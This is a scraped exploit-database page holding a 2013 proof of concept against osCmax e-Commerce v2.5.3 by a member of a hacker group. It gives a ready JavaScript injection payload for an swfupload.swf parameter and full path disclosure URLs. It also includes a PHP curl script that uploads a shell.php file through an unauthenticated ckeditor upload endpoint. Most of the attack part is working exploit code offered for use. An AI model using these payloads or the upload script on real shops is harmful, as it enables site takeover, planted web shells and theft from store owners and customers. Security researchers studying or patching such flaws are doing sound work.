0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
osCmax e-Commerce v2.5.3 (FU/ObjectInject) Multiple Vulnerabilities
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
<?/** 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [>] Title : osCmax e-Commerce v2.5.3 (FU/ObjectInject) Multiple Vulnerabilities [>] Author : KedAns-Dz [+] E-mail : ked-h (@hotmail.com / @1337day.com) [+] FaCeb0ok : fb.me/Inj3ct0rK3d [+] TwiTter : @kedans [#] Platform : PHP / WebApp [+] Cat/Tag : Multiple , File/shell Upload , Object Injection [<] <3 <3 Greetings t0 Palestine <3 <3 [>] <3 R.I.P NelsOn MandEla <3 [ps]: Algeria vs Russia o.O Brazil 2014 ... u think a HaCk-WAR be coming !!? LOL héhéhé we are brothers in the Cyber NetWork ^__^ <3 Russia <3 1,2,3 Viva l'Algerie | 4,5,6 we fall in love with Russian GIRL's xD lol. > Give me a algerian , and Korian-Car & Russian Weapon & European Enemy > see result : (http://static.echoroukonline.com/ara/files/2012/baki_tintin_967504998.jpg) ##### # [!] Description : # # P.O.C : [ CVE-2013-4144 ] and [ new 0day ] # # osCmax e-Commerce v2.5.3 is suffer from multiple vulnerabilities # remote attacker can upload file/shell via header attacks or exec # a JavaScript Code & Inject a remote Object ( see also : CVE-2013-4144 ) ##### # [+] Exploit (1) ' Object Injection / JS Injection ' : [ CVE-2013-4144 , OSVDB-92635 ( also found by me :p )] # # JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;// # # http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?movieName=[ JS Code ] # http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ] # ##### # [+] Exploit (2) ' Full Path Disclosure ' : # http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.php # http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.simple.php ##### # [+] Exploit (3) ' File/shell Upload ' : #**/?> <?php #----------------------------------------------------------------------------- $headers = array("Content-Type: application/octet-stream", "Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\""); #----------------------------------------------------------------------------- $shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re ! $path ="/temp/"; # Sh3lL Path #----------------------------------------------------------------------------- $ch = curl_init("http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$shell", 'uploadpath'=>"@$path")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; #----------------------------------------------------------------------------- ?> # [!] find file : /temp/shell.php <?/** #### #<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !> #<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +> #<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +> # ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > * # ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria ** #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , & # & KnocKout , Angel Injection , The Black Devils , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= #### **/?> # 0day.today [2024-07-08] #